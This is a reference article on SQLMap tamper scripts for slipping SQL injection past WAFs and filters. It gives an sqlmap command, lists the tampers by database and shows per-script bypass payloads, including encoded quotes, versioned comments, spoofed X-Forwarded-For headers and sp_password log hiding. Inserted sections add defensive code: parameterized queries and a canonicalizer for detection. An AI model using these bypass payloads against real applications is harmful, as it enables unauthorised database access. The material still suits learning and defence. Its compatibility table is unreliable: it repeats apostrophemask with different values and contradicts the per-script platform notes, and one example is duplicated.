I. Introduction to tamper scripts in SQLMap
1. What tamper scripts do
With the tamper scripts that ship with SQLMap, a test can to some extent evade an application's sensitive-character filtering and the blocking rules of a WAF, and then carry on with the penetration test.
Abbreviations for some of the protection systems involved:
WAF: Web Application Firewall
IPS: Intrusion Prevention System
IDS: Intrusion Detection System
2. How to use tamper scripts
--tamper=TAMPER  Use the given script(s) to tamper the injection data. Usage can be illustrated with an example:
python sqlmap.py -u "http://.../?uname=admin&pwd=pass123" --level=5 --risk=3 -p "uname" --tamper=xxx.py
This tests the specified URL at the configured level and risk settings, applying the selected tamper script to the parameter "uname".
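As an added example (not part of the original article or of sqlmap), here is the defensive counterpart of what the tamper scripts exploit: a login check that splices input into the SQL text, beside the same check using driver placeholders. The users table, its columns and the in-memory sqlite3 database are constructed for this illustration; the crafted value follows the shape of the page's own `1 AND '1'='1` example.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory user store standing in for the application's database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (uname TEXT, pwd TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'pass123')")
    return db


def login_concat(db: sqlite3.Connection, uname: str, pwd: str) -> bool:
    """The pattern tamper scripts target: user input is spliced into the SQL text.
    A character filter in front of this function sees one encoding of the input,
    the database parser sees the decoded text, and the two can disagree."""
    sql = f"SELECT COUNT(*) FROM users WHERE uname = '{uname}' AND pwd = '{pwd}'"
    return db.execute(sql).fetchone()[0] > 0


def login_param(db: sqlite3.Connection, uname: str, pwd: str) -> bool:
    """Hardened form: the statement text is fixed and the values travel separately,
    so no re-encoding of the input can change the statement's structure."""
    sql = "SELECT COUNT(*) FROM users WHERE uname = ? AND pwd = ?"
    return db.execute(sql, (uname, pwd)).fetchone()[0] > 0


if __name__ == "__main__":
    db = make_db()
    crafted = "x' OR '1'='1"  # constructed input, same shape as the page's '1'='1 example
    print("concat, valid credentials:", login_concat(db, "admin", "pass123"))
    print("concat, crafted password: ", login_concat(db, "admin", crafted))
    print("param,  crafted password: ", login_param(db, "admin", crafted))
```

The placeholder version is the control that makes every transformation in this article irrelevant to the query's structure; filtering and WAF rules are a second layer in front of it, not a replacement for it.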
II. Test tamper scripts suited to different database types
When running a penetration test with SQLMap's tamper scripts, the sheer number of tampers can be confusing, and at first it is not obvious which scripts to test with. Some scripts apply to SQL injection against commonly used databases, some to a specific type of database, and others only to a particular version range of one database. To make the usage scenario of each tamper clearer, the tampers are grouped below by type and scope:
All tamper scripts in the SQLMap tamper directory
tamper = apostrophemask , apostrophenullencode , appendnullbyte , base64encode , between , bluecoat , chardoubleencode , charencode , charunicodeencode , concat2concatws , equaltolike , greatest , halfversionedmorekeywords , ifnull2ifisnull , modsecurityversioned , modsecurityzeroversioned , multiplespaces , nonrecursivereplacement , percentage , randomcase , randomcomments , securesphere , space2comment , space2dash , space2hash , space2morehash , space2mssqlblank , space2mssqlhash , space2mysqlblank , space2mysqldash , space2plus , space2randomblank , sp_password , unionalltounion , unmagicquotes , versionedkeywords , versionedmorekeywords
General-purpose test tampers
tamper = apostrophemask , apostrophenullencode , base64encode , between , chardoubleencode , charencode , charunicodeencode , equaltolike , greatest , ifnull2ifisnull , multiplespaces , nonrecursivereplacement , percentage , randomcase , securesphere , space2comment , space2plus , space2randomblank , unionalltounion , unmagicquotes
MSSQL (Microsoft SQL Server)
tamper = between , charencode , charunicodeencode , equaltolike , greatest , multiplespaces , nonrecursivereplacement , percentage , randomcase , securesphere , sp_password , space2comment , space2dash , space2mssqlblank , space2mysqldash , space2plus , space2randomblank , unionalltounion , unmagicquotes
MySQL
tamper = between , bluecoat , charencode , charunicodeencode , concat2concatws , equaltolike , greatest , halfversionedmorekeywords , ifnull2ifisnull , modsecurityversioned , modsecurityzeroversioned , multiplespaces , nonrecursivereplacement , percentage , randomcase , securesphere , space2comment , space2hash , space2morehash , space2mysqldash , space2plus , space2randomblank , unionalltounion , unmagicquotes , versionedkeywords , versionedmorekeywords , xforwardedfor
Oracle
tamper = between , charencode , equaltolike , greatest , multiplespaces , nonrecursivereplacement , randomcase , securesphere , space2comment , space2plus , space2randomblank , unionalltounion , unmagicquotes , xforwardedfor
Microsoft Access
tamper = between , bluecoat , charencode , charunicodeencode , concat2concatws , equaltolike , greatest , halfversionedmorekeywords , ifnull2ifisnull , modsecurityversioned , modsecurityzeroversioned , multiplespaces , nonrecursivereplacement , percentage , randomcase , securesphere , space2comment , space2hash , space2morehash , space2mysqldash , space2plus , space2randomblank , unionalltounion , unmagicquotes , versionedkeywords , versionedmorekeywords
PostgreSQL
tamper = between , charencode , charunicodeencode , equaltolike , greatest , multiplespaces , nonrecursivereplacement , percentage , randomcase , securesphere , space2comment , space2plus , space2randomblank , xforwardedfor
Database types and versions each tamper applies to
(*) may apply to all versions
(-) not applicable
TAMPER                    | MySQL           | MSSQL      | Oracle | PostgreSQL
apostrophemask            | *               | *          | *      | *
apostrophenullencode      | -               | -          | -      | -
appendnullbyte            | *               | *          | *      | *
base64encode              | 4, 5, 5.5       | 2005       | 10g    | -
between                   | 5.1             | -          | -      | -
bluecoat                  | *               | *          | *      | *
apostrophemask            | 9.0.3           | 2000, 2005 | -      | 9.3
charunicodeencode         | 4, 5.0 and 5.5  | 2005       | 10g    | 8.3, 8.4, 9.0
charencode                | *               | -          | -      | -
commalessmid              | *               | -          | -      | -
concat2concatws           | *               | *          | *      | *
equaltolike               | *               | *          | *      | *
greatest                  | < 5.1           | -          | -      | -
halfversionedmorekeywords | 5.0 and 5.5     | -          | -      | -
ifnull2ifisnull           | *               | *          | *      | *
informationschemacomment  | 4, 5.0, 5.5     | 2005       | 10g    | 8.3, 8.4, 9.0
lowercase                 | 5               | -          | -      | -
modsecurityversioned      | 5               | -          | -      | -
modsecurityzeroversioned  | *               | *          | *      | *
multiplespaces            | *               | *          | *      | *
nonrecursivereplacement   | *               | *          | *      | *
overlongutf8              | 5.1.56, 5.5.11  | 2000, 2005 | N/A    | 9
percentage                | 4, 5.0, 5.5     | 2005       | 10g    | 8.3, 8.4, 9.0
randomcase                | *               | *          | *      | *
randomcomments            | *               | *          | *      | *
securesphere              | 4, 5.0, 5.5     | 2005       | 10g    | 8.3, 8.4, 9.0
space2comment             | -               | -          | -      | -
space2dash                | 4.0, 5.0        | -          | -      | -
space2hash                | >= 5.1.13       | -          | -      | -
space2morehash            | -               | 2000, 2005 | -      | -
space2mssqlblank          | *               | *          | -      | -
space2mssqlhash           | *               | *          | *      | *
space2plus                | 4, 5.0, 5.5     | 2005       | 10g    | 8.3, 8.4, 9.0
space2randomblank         | -               | *          | -      | -
sp_password               | *               | *          | *      | *
symboliclogical           | *               | *          | *      | *
unionalltounion           | *               | *          | *      | *
unmagicquotes             | 4, 5.0, 5.5     | 2005       | 10g    | 8.3, 8.4, 9.0
uppercase                 | *               | *          | *      | *
varnish                   | *               | -          | -      | -
versionedkeywords         | >= 5.1.13       | -          | -      | -
versionedmorekeywords     | *               | *          | *      | *
xforwardedfor             | *               | *          | *      | *
III. What each SQLMap tamper script does
apostrophemask.py
Function: encodes the quote character in UTF-8 as its fullwidth form (%EF%BC%87)
Platform: All
Example: 1 AND '1'='1 ==> 1 AND %EF%BC%871%EF%BC%87=%EF%BC%871
apostrophenullencode.py
Function: replaces the quote character with its illegal double-unicode counterpart (%00%27)
Platform: All
Example: 1 AND '1'='1 ==> 1 AND %00%271%00%27=%00%271
appendnullbyte.py
Function: appends an encoded NULL byte at the end of the payload
Platform: Microsoft Access
Example: 1 AND 1=1 ==> 1 AND 1=1%00
base64encode.py
Function: Base64-encodes the payload
Platform: All
Example: 1' AND SLEEP(5)# ==> MScgQU5EIFNMRUVQKDUpIw==
between.py
Function: replaces the greater-than operator (>) with BETWEEN
Platform: MSSQL 2005, MySQL 4/5.0/5.5, Oracle 10g, PostgreSQL 8.3/8.4/9.0
Example:
1 AND A > B -- ==> 1 AND A NOT BETWEEN 0 AND B --
1 AND A = B -- ==> 1 AND A BETWEEN B AND B --
bluecoat.py
Function: replaces the space character in the SQL statement with (%09) and replaces "=" with "LIKE"
Platform: MySQL 5.1, SGOS
Example: SELECT username FROM users WHERE id = 1 ==> SELECT%09username FROM%09users WHERE%09id LIKE 1
charunicodeencode.py
Function: Unicode-escape-encodes the characters of the payload
Platform: MSSQL 2000/2005, MySQL 5.1.56, PostgreSQL 9.0.3; ASP/ASP.NET
Example: SELECT FIELD%20FROM TABLE ==> %u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045
charencode.py
Function: URL-encodes the payload once
Platform: MSSQL 2005, MySQL 4, 5.0 and 5.5, Oracle 10g, PostgreSQL 8.3, 8.4, 9.0
Example: SELECT FIELD FROM%20TABLE ==> %53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45
chardoubleencode.py
Function: URL-encodes the payload twice
Platform: All
Example: SELECT FIELD FROM%20TABLE ==> %2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545
commalessmid.py
Function: replaces the commas in the payload with FROM and FOR; used when commas are filtered and the function takes three arguments
Platform: MySQL 5.0, 5.5
Example: MID(VERSION(), 1, 1) ==> MID(VERSION() FROM 1 FOR 1)
concat2concatws.py
Function: CONCAT() ==> CONCAT_WS(); used when the CONCAT() function is filtered
Platform: MySQL 5.0
Example: CONCAT(1,2) ==> CONCAT_WS(MID(CHAR(0),0,0),1,2)
equaltolike.py
Function: = ==> LIKE; used when the equals sign "=" is filtered
Platform: MSSQL 2005, MySQL 4, 5.0 and 5.5
Example: SELECT * FROM users WHERE id=1 ==> SELECT * FROM users WHERE id LIKE 1
greatest.py
Function: > ==> GREATEST
Platform: MySQL 4, 5.0 and 5.5, Oracle 10g, PostgreSQL 8.3, 8.4, 9.0
Example: 1 AND A > B ==> 1 AND GREATEST(A, B+1)=A
Comparing A with B+1 and finding that the larger of the two is A means A >= B+1, that is, A > B.
halfversionedmorekeywords.py
Function: space ==> /*!0 (prepends a versioned comment opener to each keyword)
Platform: MySQL 4.0.18, 5.0.22 (MySQL < 5.1)
Example: union ==> /*!0union
ifnull2ifisnull.py
Function: IFNULL(A, B) ==> IF(ISNULL(A), B, A)
Platform: MySQL 5.0 and 5.5
Example: IFNULL(1, 2) ==> IF(ISNULL(1),2,1)
informationschemacomment.py
Function:
appends /**/ after information_schema; used to bypass filters on information_schema
retVal = re.sub(r"(?i)(information_schema)\.", r"\g<1>/**/.", payload)
Platform: All
Example: select table_name from information_schema.tables ==> select table_name from information_schema/**/.tables
lowercase.py
Function: converts the uppercase letters in the payload to lowercase
Platform: MSSQL 2005, MySQL 4, 5.0 and 5.5, Oracle 10g, PostgreSQL 8.3, 8.4, 9.0
Example: SELECT table_name FROM INFORMATION_SCHEMA.TABLES ==> select table_name from information_schema.tables
modsecurityversioned.py
Function: wraps the complete query in a versioned comment; used to bypass the open-source WAF ModSecurity
Platform: MySQL 5.0
Example: 1 AND 2>1-- ==> 1 /*!30874AND 2>1*/--
modsecurityzeroversioned.py
Function: wraps the complete query in a zero-versioned comment to bypass the WAF; similar to the above
Platform: MySQL
Example: 1 and 2>1--+ ==> 1 /*!00000and 2>1*/--+
multiplespaces.py
Function: adds multiple spaces around SQL keywords
Platform: All
Example: 1 UNION SELECT foobar ==> 1    UNION     SELECT   foobar
nonrecursivereplacement.py
Function: doubles the keywords; usable against keyword filtering that strips a keyword in a single pass
Platform: All
Example: 1 UNION SELECT 2-- ==> 1 UNIONUNION SELESELECTCT 2--
overlongutf8.py
Function: converts the characters of the given payload to their overlong UTF-8 form
Platform: All
Example: SELECT FIELD FROM TABLE WHERE 2>1 ==> SELECT%C0%AAFIELD%C0%AAFROM%C0%AATABLE%C0%AAWHERE%C0%AA2%C0%BE1
percentage.py
Function: uses percent signs to bypass keyword filtering by prefixing every letter of each keyword with (%)
Platform: MSSQL 2000, 2005, MySQL 5.1.56, 5.5.11, PostgreSQL 9.0
Example: SELECT FIELD FROM TABLE ==> %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E
randomcase.py
Function: randomizes the letter case of the payload
Platform: MSSQL 2005, MySQL 4, 5.0 and 5.5, Oracle 10g, PostgreSQL 8.3, 8.4, 9.0
Example: INSERT ==> InseRt
randomcomments.py
Function: inserts /**/ comment markers at random positions inside the keywords of the payload; usable against keyword filtering
Platform: MySQL
Example: INSERT ==> I/**/N/**/SERT
securesphere.py
Function: appends a specially crafted string after the payload
Platform: All
Example: 1 AND 1=1 ==> 1 AND 1=1 and '0having'='0having'
space2comment.py
Function: replaces spaces with the comment marker /**/; used to bypass filtering of spaces
Platform: MSSQL 2005, MySQL 4, 5.0 and 5.5, Oracle 10g, PostgreSQL 8.3, 8.4, 9.0
Example: SELECT id FROM users ==> SELECT/**/id/**/FROM/**/users
space2dash.py
Function: replaces each space with [a comment marker (--) + a random string + a newline]
Platform: MSSQL, SQLite
Example: union select 1,2--+ ==> union--HSHjsJh%0Aselect--HhjHSJ%0A1,2--+
space2hash.py
Function: replaces each space with [a comment marker (#) + a random string + a newline]
Platform: MySQL
Example: union select 1,2--+ ==> union%23HSHjsJh%0Aselect%23HhjHSJ%0A1,2--+
space2morehash.py
Function: replaces each space with several [comment marker (#) + random string + newline] sequences
Platform: MySQL >= 5.1.13
Example: union select 1,2--+ ==> union %23 HSHjsJh %0A select %23 HhjHSJ %0A%23 HJHJhj %0A 1,2--+
space2mssqlblank.py
Function: replaces the spaces in the payload with random blank characters drawn from
blanks = ('%01', '%02', '%03', '%04', '%05', '%06', '%07', '%08', '%09', '%0B', '%0C', '%0D', '%0E', '%0F', '%0A')
Platform: MSSQL 2000, 2005
Example: SELECT id FROM users ==> SELECT%0Eid%0DFROM%07users
space2mssqlhash.py
Function: replaces the spaces in the payload with [the character # + a newline]
Platform: MSSQL, MySQL
Example: union select 1,2--+ ==> union%23%0Aselect%23%0A1,2--+
space2plus.py
Function: replaces spaces with plus signs (+)
Platform: All
Example: SELECT id FROM users ==> SELECT+id+FROM+users
space2randomblank.py
Function: replaces the spaces in the payload with random blank characters
Platform: MSSQL 2005, MySQL 4, 5.0 and 5.5, Oracle 10g, PostgreSQL 8.3, 8.4, 9.0
Example: SELECT id FROM users ==> SELECT%0Did%0DFROM%0Ausers
sp_password.py
Function: appends sp_password after the payload to obfuscate the database logs (space ==> sp_password)
Platform: MSSQL
Example: 1 AND 9227=9227-- ==> 1 AND 9227=9227 -- sp_password
symboliclogical.py
Function: replaces AND with && and OR with ||; used when those keywords are filtered
Platform: All
Example:
1 and 1=1 ==> 1 %26%26 1=1
1 or 1=1 ==> 1 %7c%7c 1=1
unionalltounion.py
Function: replaces UNION ALL SELECT with UNION SELECT
Platform: All
Example: union all select 1,2--+ ==> union select 1,2--+
unmagicquotes.py
Function: uses a wide (multibyte) character to bypass GPC addslashes
Platform: All
Example: 1' and 1=1 ==> 1%df%27 and 1=1--
uppercase.py
Function: converts the lowercase letters in the payload to uppercase
Platform: MSSQL 2005, MySQL 4, 5.0 and 5.5, Oracle 10g, PostgreSQL 8.3, 8.4, 9.0
Example: insert ==> INSERT
varnish.py
Function: adds an HTTP header "X-originating-IP" to bypass the WAF
Platform: All
Example:
headers = kwargs.get("headers", {})
headers["X-originating-IP"] = "127.0.0.1"
return payload
versionedkeywords.py
Function: wraps each non-function keyword in a versioned comment
Platform: MySQL 4.0.18, 5.1.56, 5.5.11
Example: 1 union select user() ==> 1/*!UNION*//*!SELECT*/user()
versionedmorekeywords.py
Function: wraps every keyword in a versioned comment
Platform: MySQL 5.1.56, 5.5.11
Example: 1 union select user() ==> 1/*!UNION*//*!SELECT*/user()
xforwardedfor.py
Function: adds a fake HTTP header "X-Forwarded-For" to bypass the WAF
Platform: All
Example:
headers = kwargs.get("headers", {})
headers["X-Forwarded-For"] = randomIP()
return payload
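The entries above describe, one by one, the encodings and rewrites in which a payload may arrive. As an added example (not code from the article or from sqlmap), the following Python canonicalizer is the kind of normalization a WAF rule or a log-analysis pipeline should apply before pattern matching: it peels off the transport encodings the entries describe (URL, double URL, %u, overlong UTF-8, fullwidth and NUL-padded quotes, percent-before-letter), folds the comment tricks (/**/, /*!NNNNN ... */, comment-plus-newline), control-character blanks and symbolic logical operators, and records which of them it saw, since an input that needs several layers of decoding is itself a detection signal. It goes beyond any single entry in that one routine covers the whole family. The sample inputs are constructed in the shape of the page's own `==>` outputs, and the flag names and the SQL_KEYWORDS list are this example's own choices.

```python
import re
import urllib.parse

SQL_KEYWORDS = ("UNION", "SELECT", "INSERT", "UPDATE", "DELETE", "FROM", "WHERE", "AND", "OR")

# Constructed sample inputs in the shapes the tamper entries above describe (not captured traffic).
SAMPLES = {
    "chardoubleencode": "%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544"
                        "%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545",
    "charunicodeencode": "%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044",
    "apostrophemask": "1 AND %EF%BC%871%EF%BC%87=%EF%BC%871",
    "apostrophenullencode": "1 AND %00%271%00%27=%00%271",
    "versionedkeywords": "1/*!UNION*//*!SELECT*/user()",
    "modsecurityversioned": "1 /*!30874AND 2>1*/--",
    "space2hash": "union%23HSHjsJh%0Aselect%23HhjHSJ%0A1,2--+",
    "space2mssqlblank": "SELECT%0Eid%0DFROM%07users",
    "percentage": "%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E",
    "nonrecursivereplacement": "1 UNIONUNION SELESELECTCT 2--",
    "sp_password": "1 AND 9227=9227 -- sp_password",
    "symboliclogical": "1 %26%26 1=1",
    "unmagicquotes": "1%df%27 and 1=1--",
}


def _decode_once(s: str) -> str:
    """Strip one layer of transport encoding: '+', %uXXXX, %XX and overlong 2-byte UTF-8."""
    s = s.replace("+", " ")  # query-string semantics: '+' is a space (space2plus)
    s = re.sub(r"%u([0-9A-Fa-f]{4})", lambda m: chr(int(m.group(1), 16)), s)  # charunicodeencode
    raw = urllib.parse.unquote_to_bytes(s)  # charencode; invalid %-sequences are left untouched
    # A 0xC0/0xC1 lead byte is never valid UTF-8; fold it to the ASCII byte it conceals (overlongutf8).
    raw = re.sub(rb"[\xc0\xc1]([\x80-\xbf])", lambda m: bytes([m.group(1)[0] & 0x3F]), raw)
    return raw.decode("utf-8", errors="replace")


def canonicalize(payload: str) -> dict:
    """Return {'canonical': normalized text, 'flags': obfuscation indicators seen on the way}."""
    flags = []
    if re.search(r"%u[0-9A-Fa-f]{4}", payload):
        flags.append("unicode-escape")
    s, passes = payload, 0
    for _ in range(3):  # decode until stable; needing more than one layer is itself suspicious
        nxt = _decode_once(s)
        if nxt == s:
            break
        s, passes = nxt, passes + 1
    if passes > 1:
        flags.append("multi-level-encoding")
    if "\ufffd" in s:
        flags.append("invalid-utf8")  # e.g. a lone 0xDF lead byte in front of a quote (unmagicquotes)
    if "\x00" in s:
        flags.append("null-byte")  # apostrophenullencode / appendnullbyte
        s = s.replace("\x00", "")
    if "\uff07" in s:
        flags.append("fullwidth-quote")  # apostrophemask: U+FF07 reads as a quote to a loose parser
        s = s.replace("\uff07", "'")
    if re.search(r"%(?![0-9A-Fa-f]{2})", s):
        flags.append("percent-letter")  # percentage: '%' before a non-hex letter is not an escape
        s = re.sub(r"%(?![0-9A-Fa-f]{2})", "", s)
    if re.search(r"/\*(?!!).*?\*/", s, re.S):
        flags.append("inline-comment")  # space2comment, randomcomments, informationschemacomment
        s = re.sub(r"/\*(?!!).*?\*/", " ", s, flags=re.S)
    if re.search(r"/\*!\d*", s):
        flags.append("version-comment")  # /*!NNNNN ... */ is executed by MySQL, so keep the body
        s = re.sub(r"/\*!\d*", " ", s).replace("*/", " ")
    if re.search(r"(#|--)[^\n]*\n", s):
        flags.append("comment-newline")  # space2hash, space2dash, space2mssqlhash
        s = re.sub(r"(#|--)[^\n]*\n", " ", s)
    if re.search(r"--\s*sp_password\b", s, re.I):
        flags.append("sp_password")  # MSSQL suppresses logging of statements carrying this token
    if "&&" in s or "||" in s:
        flags.append("symbolic-logical")
        s = s.replace("&&", " AND ").replace("||", " OR ")
    if re.search(r"[\x01-\x08\x0e-\x1f]", s):
        flags.append("control-whitespace")  # space2mssqlblank
    s = re.sub(r"[\s\x01-\x1f]+", " ", s).strip().upper()
    for kw in SQL_KEYWORDS:  # nonrecursivereplacement: a keyword hidden inside a copy of itself
        if not re.search(rf"\b{kw}\b", s) and re.search(rf"\b{kw}\b", s.replace(kw, "", 1)):
            flags.append(f"nested-keyword:{kw}")
    return {"canonical": s, "flags": flags}


if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        r = canonicalize(raw)
        print(f"{name:24} {r['canonical']!r:36} {r['flags']}")
```

Semantic rewrites (between, greatest, equaltolike, ifnull2ifisnull, concat2concatws, commalessmid) survive canonicalization because they are valid alternative SQL; that is why a keyword blocklist cannot be the primary control and parameterized queries are, and why the canonical form, not the raw request, is what a detection rule should match on.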